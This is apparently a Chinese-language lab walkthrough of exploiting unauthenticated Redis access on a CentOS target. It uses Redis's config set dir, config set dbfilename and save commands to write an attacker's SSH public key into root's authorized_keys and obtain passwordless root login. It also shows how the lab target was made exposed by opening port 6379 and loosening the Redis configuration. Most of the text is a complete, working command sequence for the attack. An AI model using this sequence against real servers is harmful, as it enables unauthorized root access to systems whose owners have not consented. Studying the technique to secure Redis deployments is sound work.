Redis未授權訪問實現SSH免密登錄
1. 環境簡介
1.1 物理環境
攻擊主機(kali linux)
靶機(CentOS 7)
1.2 網絡環境
Kali:192.168.32.128
CentOS:192.168.32.129
1.3 工具
Kali:Redis+SSH
CentOS:Redis(root權限)+SSH
1.4 流程
攻擊機kali遠程連接靶機Redis數據庫
攻擊機SSH生成公鑰私鑰
通過Redis將公鑰寫入靶機的SSH路徑下
攻擊機SSH連接成功
2. 攻擊過程
2.1 通過未授權訪問連接至靶機Redis
redis-cli -h 192.168.32.129
2.2 攻擊機生成SSH公鑰
生成公鑰私鑰
ssh-keygen -t rsa
一路回車
查看公鑰內容
編輯公鑰內容為Redis指令
2.3 攻擊機操作靶機Redis
指定目錄
config set dir /root/.ssh
指定文件名
config set dbfilename authorized_keys
設置公鑰內容
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+DUob5niJ3mvoDW2raDBKXcbaqYZISbWHfLeGYYUX9R3VnsS5phma/7FHmm6MQWi5a6sjPSQCdcquaEmCuzfRnWdzV5e3s0rl3/NuQt4LgJcH38dpKsrg6FMRc0y6d4dRYZ1TzwJ+U8HOne5DplbwuXH7/9ZjNrTfcSp2LR4DB+8OmW6F0+f2QHNL0xftDn+FYJmLgSBVyYch6itF9fmEMMHxuoYvkxdnFZd2nmydykVQtpbvMXf2TVTPn0NAzzubT6wbaoTzzPswgfTrEijIyBCAicJGJMo6kINb+7BsGh1o7Ehdf721sJJCkXuVJJdfF+ZCaUvHPkOa7KjpWm+FkQtxif96prhRulZhZe3XNXUkIiy/KMUKrSTJC1b15TgVN/92IrkogugSUmf6yncEiT65azUzV40XQzYhpT0OZBQk1gMvXAbnU2eZ7w22o2pF8Qpn9jYR+zM4uZX90J9p5yCxWHCOJSyxHddVzM6hxbot0IAoVnsk8e3ukZ2E/LE= root@kali\n\n\n"
保存
save
2.4 SSH連接成功
首次連接ssh
寫入公鑰后再次連接SSH
3 踩坑
3.1 Redis開啟遠程連接
Redis安裝好后需要開啟遠程連接,修改redis.conf文件
第一個框內容需要注釋掉,第二個框需要將yes改為no
修改后重啟Redis,加載指定conf文件
./redis-server /root/redis-6.0.9/redis.conf
防火牆開6379
開啟6379端口
firewall-cmd --zone=public --add-port=6379/tcp --permanent
重啟firewall
firewall-cmd --reload
查看狀態
firewall-cmd --query-port=6379/tcp
3.2 路徑/root/.ssh不存在
靶機開啟ssh
systemctl start sshd
路徑/root/.ssh不存在
這時需要本機連一下自己的ssh,就會有路徑了